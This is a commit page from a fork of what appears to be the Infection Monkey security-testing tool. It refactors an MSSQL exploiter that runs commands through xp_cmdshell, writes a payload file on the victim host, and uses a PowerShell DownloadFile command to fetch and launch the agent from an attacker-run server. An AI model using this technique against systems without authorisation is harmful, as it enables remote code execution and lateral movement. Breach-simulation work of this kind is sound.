p59342861
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Agent: Remove create_empty_payload_file() in MSSQLExploiter 

Since the commands are no longer split up into 128 character chunks,
it's simpler to just overwrite an existing file using `>` than to create
an empty file and append to it.
This commit is contained in:
Mike Salvatore 2022-06-14 12:13:45 -04:00
parent ea980c4594
commit 7846a6cac1
1 changed files with 2 additions and 15 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
monkey/infection_monkey/exploit/mssqlexec.py
View File

@ -37,8 +37,7 @@ class MSSQLExploiter(HostExploiter):
XP_CMDSHELL_COMMAND_START = "xp_cmdshell '" XP_CMDSHELL_COMMAND_START = "xp_cmdshell '"
XP_CMDSHELL_COMMAND_END = "'" XP_CMDSHELL_COMMAND_END = "'"
EXPLOIT_COMMAND_PREFIX = "<nul set /p=" EXPLOIT_COMMAND_PREFIX = "<nul set /p="
EXPLOIT_COMMAND_SUFFIX = ">>{payload_file_path}" EXPLOIT_COMMAND_SUFFIX = ">{payload_file_path}"
CREATE_COMMAND_SUFFIX = ">{payload_file_path}"
MONKEY_DOWNLOAD_COMMAND = ( MONKEY_DOWNLOAD_COMMAND = (
"powershell (new-object System.Net.WebClient)." "powershell (new-object System.Net.WebClient)."
"DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')" "DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')"
@ -79,15 +78,11 @@ class MSSQLExploiter(HostExploiter):
try: try:
# Create dir for payload # Create dir for payload
self.create_temp_dir() self.create_temp_dir()
self.create_empty_payload_file()
http_thread = self.start_monkey_server(monkey_path_on_victim) http_thread = self.start_monkey_server(monkey_path_on_victim)
self.upload_monkey(monkey_path_on_victim) self.upload_monkey(monkey_path_on_victim)
MSSQLExploiter._stop_monkey_server(http_thread) MSSQLExploiter._stop_monkey_server(http_thread)
# Clear payload to pass in another command
self.create_empty_payload_file()
self.run_monkey(monkey_path_on_victim) self.run_monkey(monkey_path_on_victim)
self.remove_temp_dir() self.remove_temp_dir()
@ -116,14 +111,6 @@ class MSSQLExploiter(HostExploiter):
) )
self.run_mssql_command(dir_creation_command) self.run_mssql_command(dir_creation_command)
def create_empty_payload_file(self):
logger.debug(f"Creating an empty payload file: {self.payload_file_path}")
suffix = MSSQLExploiter.CREATE_COMMAND_SUFFIX.format(
payload_file_path=self.payload_file_path
)
tmp_file_creation_command = MSSQLLimitedSizePayload(command="NUL", suffix=suffix)
self.run_mssql_command(tmp_file_creation_command)
def run_mssql_command(self, mssql_command): def run_mssql_command(self, mssql_command):
array_of_commands = mssql_command.split_into_array_of_smaller_payloads() array_of_commands = mssql_command.split_into_array_of_smaller_payloads()
if not array_of_commands: if not array_of_commands:
@ -182,7 +169,7 @@ class MSSQLExploiter(HostExploiter):
monkey_args = build_monkey_commandline( monkey_args = build_monkey_commandline(
self.host, self.current_depth - 1, monkey_path_on_victim self.host, self.current_depth - 1, monkey_path_on_victim
) )
suffix = ">>{}".format(self.payload_file_path) suffix = ">{}".format(self.payload_file_path)
prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
return MSSQLLimitedSizePayload( return MSSQLLimitedSizePayload(
command="{} {} {}".format(monkey_path_on_victim, DROPPER_ARG, monkey_args), command="{} {} {}".format(monkey_path_on_victim, DROPPER_ARG, monkey_args),